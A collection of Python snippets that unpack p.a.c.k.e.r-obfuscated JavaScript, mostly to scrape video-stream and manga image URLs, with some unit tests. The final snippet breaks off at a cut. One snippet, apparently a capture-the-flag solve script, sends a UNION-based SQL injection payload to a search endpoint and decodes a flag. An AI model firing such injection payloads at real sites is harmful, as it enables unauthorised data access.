def get_video_url(url, DEBUG=0):
    scraper = cfscrape.create_scraper()

    try:
        response = scraper.get(
            'http://www.fastvideo.me/embed-%s-607x360.html' %
            re.search('me/([^/]+)/', url).group(1))
    except Exception:
        return False, "Url not found"

    if 'p,a,c,k,e,d' in response.text:
        try:
            packed = re.search(
                r'<script[^>]+>eval\((function\(p,a,c,k,e,d\).*\)\))\).*?<\/script>',
                response.text, re.S).group(1)
        except Exception:
            return False, "Packed regex error"

        if packed:
            import jsbeautifier.unpackers.packer as packer
            jwconfig = packer.unpack(packed)

            url = re.search('file:"([^"]+)"', jwconfig).group(1)

            return True, url
    else:
        return False, "Packed not found"
Example #2
def is_artefact_packed(filename, byte_content):
    """
   Returns a tuple (is_packed, unpacked_byte_content) if the artefact is packed using an algorithm
   similar to Dave Edward's p.a.c.k.e.r algorithm. This appears to generate syntax errors compounding feature analysis,
   but we try anyway...
   """
    # dont load the file again if we already have the byte-content...
    if byte_content is None:
        with open(filename, 'rb') as fp:
            byte_content = fp.read()

    try:
        source = fast_decode(byte_content)
        is_packed = packer.detect(source)
        if is_packed:
            ret = packer.unpack(source)
            # TODO FIXME... yuk this is so silly! But we have to return bytes since the extract-features.jar program expects that...
            # fortunately most artefacts aren't packed, so this is not as expensive as it could be...
            result = decode(encode(ret, 'utf-8', 'backslashreplace'),
                            'unicode-escape').encode()
            assert isinstance(result, bytes)
            assert len(result) > 0
            return (True, result)
        # else
        return (False, byte_content)
    except Exception:
        # we fail an artefact that is purportedly packed but which cannot be unpacked...
        raise
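A minimal, runnable sketch of the detect/unpack round trip used above, assuming only that the jsbeautifier package is installed; the packed sample is the known-good string from the jsbeautifier test suite (see Examples #8 and #9 below):

import jsbeautifier.unpackers.packer as packer

packed = ("eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)"
          "){while(c--)r[c]=k[c]||c;k=[function(e){return r[e]}];e="
          "function(){return'\\\\w+'};c=1};while(c--)if(k[c])p=p.replace("
          "new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c]);return p}('0 2=1',"
          "62,3,'var||a'.split('|'),0,{}))")

if packer.detect(packed):          # True for Dean Edwards-style p.a.c.k.e.r output
    print(packer.unpack(packed))   # prints: var a=1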
Example #3
    def _get_streams(self):
        headers = {
            'User-Agent': useragents.CHROME,
            'Referer': self.url
        }

        res = http.get(self.url)
        html_text = res.text
        soup = BeautifulSoup(html_text, 'html.parser')
        scripts = soup.find_all('script')
        code = 'fail'
        url = None
        for script in scripts:
            if script.string is not None:
                if "document.getElementsByTagName('video')[0].volume = 1.0;" in script.string:
                    code = script.string
                    startidx = code.find('eval(function(p,a,c,k,e,')
                    endidx = code.find('hunterobfuscator =')
                    code = code[startidx:endidx]
                    # First part of the deobfuscation: slice out the packed code.
                    #code = aadecode(code)
                    #code = code.aadecode()
                    if not code.replace(' ', '').startswith('eval(function(p,a,c,k,e,'):
                        code = 'fail'
                    break

        # The second part of the deobfuscation happens here, using the jsbeautifier packer module.
        if code != 'fail':
            unpacked = packer.unpack(code)
            video_location = unpacked[unpacked.rfind('http'):unpacked.rfind('m3u8') + 4]
            url = video_location
        if url:
            self.logger.debug('HLS URL: {0}'.format(url))
            yield 'live', HLSStream(self.session, url, headers=headers)
Example #4
def get_video_url(url):

    list = []
    from xbmctools import getnet, finddata
    data = getnet(url)

    regx = '''<script type="text/javascript"(.*)</script>'''
    #print "jucie",_filter(data)
    #print"data1", data
    data2 = finddata(data.replace("\n", ""), 'eval(', '</script')

    unpack = packer.unpack(data2)
    print 'unpack', unpack

    regx = '''http://(.*?)mkv'''

    try:
        link = 'http://' + re.findall(regx, unpack, re.M | re.I)[0] + 'mkv'

    except Exception:
        regx = '''http://(.*?)mp4'''
        link = 'http://' + re.findall(regx, unpack, re.M | re.I)[0] + 'mp4'

    print 'link', link

    return link
Example #5
def extract_ports(js_url):

    ports = {}

    # Download the JS file.
    html = download_webpage(js_url)
    if html is None:
        log.error('Failed to download webpage: %s', js_url)
        return ports

    try:
        # For now, try to extract the css/port pairs from the JS.
        # This is likely a really bad way of doing it; I'll revisit later.
        unpack = packer.unpack(html)
        unpack = unpack.replace("$(document).ready(function(){", "")
        unpack = unpack.replace("});", "")
        unpack = unpack.replace("\\", "")
        unpack = unpack.replace("'", "")
        unpack = unpack.replace(".", "")

        # Pull out everything that is within a bracket.
        parts = re.findall(r'\((.*?)\)', unpack)

        # Now convert the list into a dictionary.
        # Entries alternate: css selector, then its port (see the pairing sketch after this function).
        i = 0
        while i < len(parts):
            ports[parts[i]] = parts[i + 1]
            i += 2

        return ports

    except Exception as e:
        log.exception('Failed to extract ports from %s: %s.', js_url, e)
        return ports
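The alternating css/port pairing above can also be done with zip over slices; a small sketch (the sample parts list is made up for illustration):

# parts alternates css selector / port, e.g. as produced by re.findall above
parts = ['.c1', '8080', '.c2', '9001']
ports = dict(zip(parts[0::2], parts[1::2]))   # {'.c1': '8080', '.c2': '9001'}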
Example #6
def play_video(selection):
	r = requests.get(arconaitv_url+selection)
	html_text = r.text
	soup = BeautifulSoup(html_text, 'html.parser')
	scripts = soup.find_all('script')
	for script in scripts:
		if script.string is not None:
			if "document.getElementsByTagName('video')[0].volume = 1.0;" in script.string:
				code = script.string
				startidx = code.find('eval(function(p,a,c,k,e,')
				endidx = code.find('hunterobfuscator =')
				code = code[startidx:endidx]
				# First part of the deobfuscation: slice out the packed code.
				#code = aadecode(code)
				#code = code.aadecode()
				if not code.replace(' ', '').startswith('eval(function(p,a,c,k,e,'):
					code = 'fail'
				break
			else:
				code = 'fail'
		else:
			code = 'fail'
	# The second part of the deobfuscation happens here, using the jsbeautifier packer module.
	if code != 'fail':
		unpacked = packer.unpack(code)
		video_location = unpacked[unpacked.rfind('http'):unpacked.rfind('m3u8')+4]
		play_item = xbmcgui.ListItem(path=video_location+'|User-Agent=%s' % urllib2.quote(USER_AGENT, safe=''))
		xbmcplugin.setResolvedUrl(addon_handle, True, listitem=play_item)
	else:
		xbmcgui.Dialog().ok('Sorry','Could not deobfuscate the code.')
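Instead of the rfind slicing used above, the HLS URL can be pulled from the unpacked source with a regex; a small sketch (not from the original add-on, and it assumes at most one m3u8 URL appears in the unpacked code):

import re

match = re.search(r'https?://\S+?\.m3u8', unpacked)
video_location = match.group(0) if match else None   # None when no HLS URL is found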
Example #7
    def parse(self, response):

        script = response.xpath('//script[1]/text()').extract()[0]
        parse_str = script.strip().split('\n')[2]
        # print(parse_str)
        pages = packer.unpack(parse_str.strip())
        # pages = packer.unpack(str(parse_str.strip()))
        pages = (pages.replace("var pages=pages=\\'[", "")
                 .replace(";", "")
                 .replace("\\", "")
                 .replace('"', "")
                 .replace("[", "")
                 .replace("]", "")
                 .split(","))

        # for page in pages:
        item = LearningItem()
        #     item['image_urls'] = "https://images.dmzj.com/" + page

        item['image_urls'] = ["https://images.dmzj.com/" + x for x in pages]

        item['img_dirname2'] = response.xpath(
            "//span[@class='redhotl']/text()").extract()[0]
        item['img_dirname1'] = response.xpath(
            "//a[@class='redhotl']/text()").extract()[0]
        # item['image_urls'].append("https://images.dmzj.com/" + pages[0])

        # for img_link in pages:

        # item["image_urls"] = "https://images.dmzj.com/" + img_link

        yield item
Example #8
    def test_unpack(self):
        """Test unpack() function."""
        check = lambda inp, out: self.assertEqual(unpack(inp), out)

        check("eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)"
              "){while(c--)r[c]=k[c]||c;k=[function(e){return r[e]}];e="
              "function(){return'\\\\w+'};c=1};while(c--)if(k[c])p=p.replace("
              "new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c]);return p}('0 2=1',"
              "62,3,'var||a'.split('|'),0,{}))", 'var a=1')
Example #9
    def test_unpack(self):
        """Test unpack() function."""
        check = lambda inp, out: self.assertEqual(unpack(inp), out)

        check(
            "eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)"
            "){while(c--)r[c]=k[c]||c;k=[function(e){return r[e]}];e="
            "function(){return'\\\\w+'};c=1};while(c--)if(k[c])p=p.replace("
            "new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c]);return p}('0 2=1',"
            "62,3,'var||a'.split('|'),0,{}))", 'var a=1')
Example #10
def fetch_images_url(chapter_url=''):
    request_url = HOME_URL_PREFIX + chapter_url
    req = requests.get(request_url, headers=HEADERS)
    tmp_url = req.text.split('\n')[11]  # line 11 of the HTML holds the image URL suffixes
    tmp_url = unpack(tmp_url)
    pic_url_str = re.sub('var pages\s?=\s?pages\s?=\\\\\'\[\"', '', tmp_url)
    pic_url_str = re.sub('\"\]\\\\\';\s?', '', pic_url_str)

    pic_url_arr = []  # image URLs for the latest chapter
    for i in pic_url_str.replace('\\\/', '/').split('","'):
        # url = PIC_URL_PREFIX + urllib.quote(i.decode('unicode-escape').encode('utf8'))
        url = PIC_URL_PREFIX + i
        pic_url_arr.append(url)
    return pic_url_arr
Example #11
def fetch_images_url(chapter_url=''):
    request_url = HOME_URL_PREFIX + chapter_url
    req = requests.get(request_url, headers=HEADERS)
    tmp_url = req.text.split('\n')[11]  # line 11 of the HTML holds the image URL suffixes
    tmp_url = unpack(tmp_url)
    pic_url_str = re.sub('var pages\s?=\s?pages\s?=\\\\\'\[\"', '', tmp_url)
    pic_url_str = re.sub('\"\]\\\\\';\s?', '', pic_url_str)

    pic_url_arr = []  # image URLs for the latest chapter
    for i in pic_url_str.replace('\\\/', '/').split('","'):
        # url = PIC_URL_PREFIX + urllib.quote(i.decode('unicode-escape').encode('utf8'))
        url = PIC_URL_PREFIX + i
        pic_url_arr.append(url)
    return pic_url_arr
Example #12
def solve_js(html):
    js = '(function' + re.findall('function(.*?)</script>', html)[0]
    encrypted_js = js.split(',')[-3][1:-15]
    decrypted_js = lzstring.LZString().decompressFromBase64(encrypted_js)
    original_js = js.split(',')
    original_js[-3] = "'" + decrypted_js + "'.split('|')"
    packed_js = 'eval(' + ','.join(original_js) + ')'
    # print('packed_js', packed_js)
    unpack = packer.unpack(packed_js)
    print(unpack)
    # js_result = jsbeautifier.beautify(unpack)
    # print('js_result', js_result)
    imgData = re.findall(r"SMH\.imgData\((.*?)\)\.preInit\(\);", unpack)[0]
    res = json.loads(imgData)
    print(res['bname'])
    return res
Example #13
def obtem_vidig2(url):
    import jsbeautifier.unpackers.packer as packer
    soup = BeautifulSoup(abrir_url(url))
    codigo_fonte = packer.unpack(soup('script')[6].text)
    #ow = open(r'G:\\html_list\\script4.html','w')
    #ow.write(str(soup('script')[6]))
    #ow.close()#"(http://.*?/v.flv)"
    try:
        url_video = re.findall(r"'(http://.*?/v.mp4)\\'", codigo_fonte)[0]
        return [url_video + '|User-Agent=Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36', "-"]
    except Exception:
        pass

    try:
        url_video = re.findall(r'"(http://.*?/v.flv)"', codigo_fonte)[0]
        return [url_video + '|User-Agent=Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36', "-"]
    except Exception:
        return ["-", "-"]
Example #14
def get_video_url(url):

    links = []
    from xbmctools import getnet, finddata
    data = getnet(url)

    regx = '''<script type="text/javascript"(.*)</script>'''
    #print "jucie",_filter(data)
    #print"data1", data
    data2 = finddata(data.replace("\n", ""), 'eval(', '</script')

    try:
        unpack = packer.unpack(data2)
    except Exception:
        unpack = data

    regx = '''file:"(.*?)m3u8"'''
    try:
        m3u8 = re.findall(regx, unpack, re.M | re.I)[0] + 'm3u8'
        links.append(('m3u8', m3u8))
    except Exception:
        pass

    regx = ''',{file:"(.*?)mp4"'''
    try:
        mp4 = re.findall(regx, unpack, re.M | re.I)[0] + 'mp4'
        links.append(('mp4', mp4))
    except Exception:
        pass

    print "list", links
    return links

    # Unreachable: leftover from an earlier version of this function.
    Pre_Stream_URL = re.search('file:"(.*)"', unpack).group(1)
    print 'Pre_Stream_URL1', Pre_Stream_URL
    Pre_Stream_URL = re.search('file:"(.*)",label', unpack).group(1)

    print 'Pre_Stream_URL2', Pre_Stream_URL
    sys.exit(0)
    return Pre_Stream_URL
Example #15
    def fetch(self, url):
        soup = self.requester.get(url)

        test = re.search(r"eval(?:.+fullscreen.+\))", soup.text)

        if test is None:
            return

        unpack = packer.unpack(test.group())

        test = re.search("http:\/\/[^\s\"]+.\.(?:mp4|mpg|avi|flv)", unpack)

        if test is None:
            return

        info = self.requester.send(test.group())

        info = re.search(r"(['\"])(?P<url>https:.+)\1", info.text)

        if info is None:
            return

        return info.group("url")
Example #16
    def parse_page_ext2(self, response):
        """
        拿到跟图片地址有关的js
        """
        manga_no = response.meta['manga_no']
        chapter_no = response.meta['chapter_no']
        manga_name = response.meta['manga_name']
        chapter_name = response.meta['chapter_name']
        manga_save_folder = response.meta['manga_save_folder']
        data = response.meta['data']
        current_page = response.meta['current_page']
        page_count = response.meta['page_count']
        try_repr = response.meta.setdefault('try_repr', False)
        proxy = response.meta['proxy']
        # the response body is a chunk of packed JS code
        # decoded with jsbeautifier 1.7.5
        # Python 3 compatible
        response_body_str = str(response.body, response.encoding)
        packed_js = response_body_str
        try:
            if try_repr:
                packed_js = repr(packed_js)
            unpacked_js = packer.unpack(packed_js).replace("\\'", "'")

            # after unpacking, extract the pieces of the image path
            cid = re.findall('var cid=(.*?);', unpacked_js)[0]
            key = re.findall("var key='(.*?)';", unpacked_js)[0]
            pix = re.findall('var pix="(.*?)";', unpacked_js)[0]
            pvalue = re.findall('var pvalue=\[(.*?)\];', unpacked_js)[0]
            pvalue = pvalue.replace('"', '')
            if (',' in pvalue):
                pvalue = pvalue.split(',')
            else:
                pvalue = [
                    pvalue,
                ]
            image_url = pix + pvalue[0] + '?cid=' + cid + '&key=' + key + '&uk='

            item = Dm5Item()
            item['imgurl'] = image_url
            item['imgname'] = image_url.split('/')[-1].split('_')[0].zfill(
                3) + '.jpg'
            # downloading without the pipeline needs special handling of the download path
            item['imgfolder'] = settings.get(
                'IMAGES_STORE') + '/' + manga_save_folder + '/' + chapter_no
            # prepare to download the image
            image_save_path = os.path.join(item['imgfolder'], item['imgname'])

            # skip images that have already been downloaded
            if not os.path.exists(image_save_path):
                if not os.path.exists(item['imgfolder']):
                    os.makedirs(item['imgfolder'])
                print('current page', manga_name, chapter_no, chapter_name,
                      current_page, '/', page_count)
                host = image_url.split('//')[1].split('/')[0]
                headers = {
                    'Host':
                    host,
                    'User-Agent':
                    'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0',
                    'Accept':
                    '*/*',
                    'Connection':
                    'close',
                    'Accept-Language':
                    'zh-CN,zh;q=0.8,en;q=0.5,en-US;q=0.3',
                    'Accept-Encoding':
                    'gzip, deflate',
                    'Referer':
                    'http://www.dm5.com/m' + str(data['cid']) + '-p' +
                    str(current_page) + '/',
                    'DNT':
                    '1',
                }
                # print 1111, image_url

                # download the image with urllib2
                # req = urllib2.Request(image_url, headers=headers)
                # res = urllib2.urlopen(req)
                # # print res
                # with open(image_save_path, 'wb') as f:
                #     f.write(res.read())

                # download the image with requests
                # res = requests.get(image_url, headers=headers, proxies=proxyDict)
                # with open(image_save_path, 'wb') as f:
                #     f.write(res.content)

                # download the image with the custom image pipeline
                item['imgheaders'] = headers
                item['imgproxy'] = proxy
                yield item

            # prepare to fetch the next page
            current_page += 1
            if int(current_page) > int(page_count):
                return
            data['page'] = current_page

            pages_url = 'http://www.dm5.com/m' + str(
                data['cid']) + '/chapterfun.ashx?' + urllib.parse.urlencode(
                    data)
            yield scrapy.Request(pages_url,
                                 cookies=cookies,
                                 headers={
                                     'Referer':
                                     'http://www.dm5.com/m' +
                                     str(data['cid']) + '/'
                                 },
                                 meta={
                                     'proxy': proxy,
                                     'manga_no': manga_no,
                                     'chapter_no': chapter_no,
                                     'manga_name': manga_name,
                                     'chapter_name': chapter_name,
                                     'manga_save_folder': manga_save_folder,
                                     'data': data,
                                     'current_page': current_page,
                                     'page_count': page_count
                                 },
                                 callback=self.parse_page_ext2)
        except UnpackingError as e:
            print('failed to unpack JS, request URL', response.url)
            print('current page', current_page)
            response_body_str = str(response.body, response.encoding)
            print('response body', response_body_str)
            if try_repr:
                # prepare to fetch the next page
                current_page += 1
                if int(current_page) > int(page_count):
                    return
                data['page'] = current_page

                pages_url = 'http://www.dm5.com/m' + str(
                    data['cid']
                ) + '/chapterfun.ashx?' + urllib.parse.urlencode(data)
                yield scrapy.Request(pages_url,
                                     cookies=cookies,
                                     headers={
                                         'Referer':
                                         'http://www.dm5.com/m' +
                                         str(data['cid']) + '/'
                                     },
                                     meta={
                                         'proxy': proxy,
                                         'manga_no': manga_no,
                                         'chapter_no': chapter_no,
                                         'manga_name': manga_name,
                                         'chapter_name': chapter_name,
                                         'manga_save_folder':
                                         manga_save_folder,
                                         'data': data,
                                         'current_page': current_page,
                                         'page_count': page_count
                                     },
                                     callback=self.parse_page_ext2)
            else:
                yield scrapy.Request(response.url,
                                     cookies=cookies,
                                     meta={
                                         'proxy': proxy,
                                         'manga_no': manga_no,
                                         'chapter_no': chapter_no,
                                         'manga_name': manga_name,
                                         'chapter_name': chapter_name,
                                         'manga_save_folder':
                                         manga_save_folder,
                                         'data': data,
                                         'current_page': current_page,
                                         'page_count': page_count,
                                         'try_repr': True
                                     },
                                     callback=self.parse_page_ext2,
                                     dont_filter=True)
Example #17
 def check(inp, out):
     return detect(inp) and self.assertEqual(unpack(inp), out)
Example #18
req = requests.Request(
    'GET',
    base_url +
    '/Search?query=1%27+and+1%3D0+union+select+1%2C2%2CContent%2C4%2Cnull%2Cnull+from+Reviews+where+id%3D10+--+-',
    headers=headers,
    cookies=cookies)
r = requestDebug(s, req)
img = BeautifulSoup(r.text, 'lxml').find('img', {'src': '2'}).get('alt')
first_obfuscated_part = img.split('\n', 3)[2]
second_obfuscated_part = img.split('\n', 4)[3]

#
# Reverse algorithm in second_obfuscated_part to get the "good" input
#

second_part_unpacked = packer.unpack(img.split('\n', 4)[3]).split(';', 2)[0]
flag = eval(second_part_unpacked.split()[1].split('"')[1])
myDebug('1:\n%s\n' % flag)
input = flag[::-1]
myDebug('2:\n%s\n' % input)
intermediate = ""
for i in range(len(input)):
    intermediate += chr(input[i] - 20) if i % 2 == 0 else chr(input[i])
myDebug('3:\n%s\n' % intermediate)
input = intermediate.replace('\\x', '')
myDebug('4:\n%s\n' % input)
intermediate = b''
for i in range(0, len(input), 2):
    intermediate += codecs.decode(input[i:i + 2], 'hex')
input = codecs.decode(intermediate, 'base64').decode()
myDebug('5:\n%s\n' % input)
Example #19
 def check(inp, out):
     return self.assertEqual(unpack(inp), out)
Example #20
 def check(inp, out):
     return detect(inp) and self.assertEqual(unpack(inp), out)
Example #21
        def check(inp, out): return self.assertEqual(unpack(inp), out)

        check("eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)"